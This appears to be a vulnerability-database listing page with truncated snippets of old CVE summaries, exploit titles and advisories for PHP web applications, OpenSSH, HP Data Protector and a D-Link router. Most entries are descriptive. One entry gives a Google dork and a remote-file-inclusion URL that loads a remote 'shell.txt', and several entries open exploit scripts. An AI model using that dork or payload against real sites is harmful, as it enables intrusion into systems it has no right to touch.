Ultimate PHP Board 2.0b1 - '/chat/login.php' Code Execution

!/usr/bin/perl +------------------------------------------------------------------------------------------- + Ultimate PHP Board +------------------------------------------------------------------------------------------- + Details: + Ultimate PHP Board chat/login.php does not sanatize the...

CVE-2006-6454

CVE-2006-6454 affects J-OWAMP Web Interface 2.1b and earlier. The vulnerability arises in execInBackground.php where remote attackers can cause arbitrary command execution by injecting shell metacharacters into the exe and args parameters used in an exec() call. This is a remote, unauthenticated ...

Claroline <= 1.8.0 rc1 (import.lib.php) Remote File Include Vulnerability

No description provided by source. claroline = 180rc1 Remote File Inclusion Download Source : http://www.claroline.net/dlarea/claroline180rc1.tar.gz Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; claroline/inc/lib/import.lib.php bugs ; begin line 8 requireonc...

pHNews <= alpha 1 (templates_dir) Remote Code Execution Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :...

IBM eGatherer <= 3.20.0284.0 (ActiveX) Remote Code Execution Exploit

No description provided by source. This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core Framework dual GPLv2 and Artisti...

iziContents-php.txt

!/usr/bin/php -q -d shortopentag=on include/rssfunctions.php line 32-40: .... $GLOBALS"rootdp" = './'; requireonce $GLOBALS"rootdp"."include/config.php"; requireonce $GLOBALS"rootdp"."include/db.php"; requireonce $GLOBALS"rootdp"."include/session.php"; includeonce...

HP Data Protector Backup Agent RCE

The version of HP Data Protector running on the remote host is affected by an unspecified flaw in the backup agent. An unauthenticated, remote attacker can exploit this to execute arbitrary code through the use of unauthorized backup commands. %NASLMINLEVEL 70300 C Tenable Network Security, Inc...

a6mambohelp.txt

a6mambohelpdesk Mambo Component d0rkiz : allinurl:"coma6mambohelpdesk" http://www.site.com/administrator/components/coma6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfiglivesite=http://shell.txt by Dr.Jr7...

[Full-disclosure] [XPA] ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability

======================================================================================= XOR Crew :: Security Advisory 4/10/2006 ======================================================================================= ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability...

The Includer RCE Vulnerability

The Includer is prone to a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2005 David Maciejak Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

PEHEPE Membership Management System Multiple Vulnerabilities

Advisory: PEHEPE Membership Management System Multiple Vulnerabilities - Author: Yunus Emre Yilmaz -- mailatyunusemreyilmazdotcom - Application: PEHEPE MemberShip Management System http://www.pehepe.org/UYELK3 - Affected Version : v3 maybe older versions.. - Risk : Critical -- Details0 : XSS...

CVE-2006-0173

Hummingbird Collaboration (Hummingbird Enterprise Collaboration)

OpenSSH < 3.0.2 'UseLogin Environment Variables' RCE Vulnerability

OpenSSH is prone to a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2005 by EMAZE Networks S.p.A. Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

phpMyAdmin < 2.6.2-RC1 RCE

Binary data 2787.prm...

CVE-2004-1195

CVE-2004-1195 affects Star Wars Battlefront versions 1.11 and earlier. The server could be forced to read an arbitrary memory address via a crafted join request, allowing remote attackers to cause an application crash (DoS). The connected documents provide this description; no patch/version detai...

CVE-2002-1211

Prometheus 6.0 and earlier is vulnerable to remote PHP code execution via a tainted PROMETHEUS_LIBRARY_BASE that can be set to a remote server and loaded by index.php, install.php, or test_*.php. The underlying flaw is the conditional inclusion of files (autoload.lib, prometheus-lib.path) based o...

CVE-2001-1237

CVE-2001-1237 affects Phormation PHP script versions 0.9.1 and earlier. The issue is a remote file inclusion flaw: an HTTP request that modifies the phormationdir variable can cause the application to include files from remote Web sites, enabling remote attackers to execute arbitrary code. This y...

CVE-2022-28958

CVE-2022-28958 maps to a D-Link DIR816L remote code execution vulnerability. CNVD/CNNVD describe an RCE in DIR816L_FW206b01 due to improper filtering of the value parameter in shareport.php, allowing arbitrary code execution on affected devices. No specific affected versions or patch details are ...